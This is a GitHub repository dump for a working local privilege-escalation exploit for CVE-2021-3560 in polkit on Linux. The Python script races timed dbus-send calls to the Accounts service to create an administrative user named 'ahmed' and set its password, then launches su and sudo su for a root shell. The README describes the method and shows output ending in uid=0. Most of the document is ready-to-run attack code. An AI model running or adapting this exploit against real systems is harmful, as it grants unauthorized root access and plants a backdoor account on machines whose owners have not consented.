├── CVE-2021-3560-Auth-On.gif
├── CVE-2021-3560-Root.gif
├── CVE-2021-3560.py
└── README.md


/CVE-2021-3560-Auth-On.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Almorabea/Polkit-exploit/0c01b67ffacfb2579600d3e62e331f8511dcdf9d/CVE-2021-3560-Auth-On.gif


--------------------------------------------------------------------------------
/CVE-2021-3560-Root.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Almorabea/Polkit-exploit/0c01b67ffacfb2579600d3e62e331f8511dcdf9d/CVE-2021-3560-Root.gif


--------------------------------------------------------------------------------
/CVE-2021-3560.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import sys
 3 | import time
 4 | import subprocess
 5 | import random
 6 | import pwd
 7 | 
 8 | 
 9 | print ("**************")
10 | print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
11 | print("Exploit code written by Ahmad Almorabea @almorabea")
12 | print("Original exploit author: Kevin Backhouse ")
13 | print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
14 | print ("**************")
15 | print("[+] Starting the Exploit ")
16 | time.sleep(3)
17 | 
18 | check = True
19 | counter = 0
20 | while check:
21 | 	counter = counter +1
22 | 	process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
23 | 	try:
24 |     		#print('1 - Running in process', process.pid)
25 | 		Random = random.uniform(0.006,0.009)
26 | 		process.wait(timeout=Random)
27 | 		process.kill()
28 | 	except subprocess.TimeoutExpired:
29 |     		#print('Timed out - killing', process.pid)
30 |     		process.kill()
31 | 
32 | 	user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
33 | 	if user.find("uid") != -1:
34 | 		print("[+] User Created with the name of ahmed")
35 | 		print("[+] Timed out at: "+str(Random))
36 | 		check =False
37 | 		break
38 | 	if counter > 2000:
39 | 		print("[-] Couldn't add the user, try again it may work")
40 | 		sys.exit(0)
41 | 
42 | 
43 | for i in range(200):
44 | 	#print(i)
45 | 	uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)
46 | 
47 | 	#In case you need to put a password un-comment the code below and put your password after string:yourpassword'
48 | 	password = "string:"
49 | 	#res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
50 | 	#password = f"string:{res.rstrip()}"
51 | 
52 | 	process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
53 | 	try:
54 |     		#print('1 - Running in process', process.pid)
55 |     		Random = random.uniform(0.006,0.009)
56 |     		process.wait(timeout=Random)
57 |     		process.kill()
58 | 	except subprocess.TimeoutExpired:
59 |     		#print('Timed out - killing', process.pid)
60 |     		process.kill()
61 | 
62 | print("[+] Timed out at: " + str(Random))
63 | print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")
64 | 
65 | p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)
66 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Polkit-exploit - CVE-2021-3560
 2 | Privilege escalation with polkit - CVE-2021-3560
 3 | 
 4 | # Summary 
 5 | CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to it and at the end logging as the created user and then elevate to root.
 6 | 
 7 | # Exploit Code Author
 8 | Ahmad Almorabea
 9 | @almorabea
10 | http://almorabea.net
11 | 
12 | # Usage
13 | ```
14 | test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py 
15 | **************
16 | Exploit: Privilege escalation with polkit - CVE-2021-3560
17 | Exploit code written by Ahmad Almorabea @almorabea
18 | Original Exploit Author: Kevin Backhouse 
19 | For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
20 | [+]Starting the Exploit 
21 | [+] User Created with the name of ahmed
22 | [+] Timed out at: 0.008446890996407191
23 | [+] Timed out at: 0.008934336684707084
24 | [+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
25 | bash: cannot set terminal process group (46983): Inappropriate ioctl for device
26 | bash: no job control in this shell
27 | root@ubuntu:/home/test/Desktop# id
28 | uid=0(root) gid=0(root) groups=0(root)
29 | root@ubuntu:/home/test/Desktop# whoami
30 | root
31 | root@ubuntu:/home/test/Desktop#
32 | ```
33 | 
34 | # Demo
35 | GUI Authentication
36 | ******
37 | ![](CVE-2021-3560-Auth-On.gif)
38 | 
39 | Terminal Authentication
40 | ******
41 | ![](CVE-2021-3560-Root.gif)
42 | 
43 | # Credit
44 | Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)
45 | 


--------------------------------------------------------------------------------